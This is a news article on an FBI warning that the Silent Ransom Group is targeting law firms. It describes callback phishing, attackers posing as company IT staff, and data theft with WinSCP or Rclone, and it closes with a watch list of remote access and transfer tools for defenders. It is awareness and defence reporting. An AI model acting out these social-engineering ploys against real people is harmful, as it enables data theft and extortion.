The FBI has recently alerted U.S. law firms about an escalating cybersecurity threat from a group known as the Silent Ransom Group (SRG), also referred to as Luna Moth or Chatty Spider. Since early 2023, this group has intensified its focus on law firms, employing tactics that combine phishing emails and social engineering calls to access sensitive legal information.
SRG is not a new threat actor. Established in 2022, the group previously targeted sectors like healthcare and insurance. However, its recent shift towards law firms suggests a strategic focus on industries that handle highly sensitive client information, which can yield significant financial and reputational consequences in the event of a breach.
In November 2023, the FBI detailed SRG’s tactics, specifically their use of a technique known as callback phishing. This method involves sending phishing emails designed to appear as unclickable images, creating a false sense of urgency while encouraging victims to call a provided phone number. Such tactics can circumvent standard email security measures, effectively tricking users into assisting attackers in breaching their own systems.
Operational Tactics
The simplicity of SRG’s phishing campaigns has proven deceptive. The group sends emails disguised as notifications from subscription service providers, claiming unauthorized charges. Recipients are asked to call a number mentioned in the email to resolve the issue. During these phone calls, attackers often persuade victims to download remote access software, providing SRG with entry into their networks.
Notably, SRG has recently escalated its approach by directly contacting employees and impersonating their own company’s IT personnel. They instruct employees to initiate remote sessions or visit specific websites, leading to the installation of tools that grant further control to the attackers. Once they access the system, they utilize software like WinSCP or modified versions of Rclone to exfiltrate sensitive data.
Upon retrieving the sensitive information, SRG delivers ransom notes demanding payment to prevent the public release or sale of the stolen data. They may also follow up with phone calls to coerce organizations into negotiating ransoms.
“Similar to their phishing emails posing as a company with a subscription, SRG will also call employees at a victim company to pressure them into engaging in ransom negotiations.”
The FBI
It is significant to note that the FBI’s warning coincided with insights from Cofense Intelligence’s May 2025 report, which outlined the extensive misuse of Remote Access Tools (RATs) by cybercriminal organizations. Among the findings, ConnectWise ScreenConnect was highlighted as the most frequently exploited RAT in attacks this year.
Targeting Law Firms
Law firms represent an alluring target for cybercriminals due to their handling of confidential client information, delicate corporate negotiations, and sensitive legal documents. Breaching a law firm not only jeopardizes financial stability but also threatens substantial reputational damage.
The targeting of law firms has been a growing trend; back in April 2022, researchers identified malicious activity where scammers utilized AI-generated images to fabricate fake law firm identities, underscoring the prolonged vulnerability of this sector.
Challenges in Detection
SRG’s operations prove effective in part due to their employment of legitimate system management and remote access tools, which evade detection by standard antivirus software. Their techniques leave minimal traces, complicating post-incident investigations and mitigation efforts.
Network administrators are advised to monitor for unusual downloads of tools such as Zoho Assist, AnyDesk, and Splashtop; they should also be alert for any unexpected external file transfers involving WinSCP or Rclone. Other warning signs include unsolicited emails regarding subscription renewals and unanticipated IT-related phone calls.
Ultimately, the FBI emphasizes the importance of implementing robust cybersecurity practices, which involve training staff to recognize phishing attempts and establishing clear communication protocols within IT departments. Employing strong passwords and two-factor authentication is also essential, alongside regular backups to mitigate damage from potential breaches.
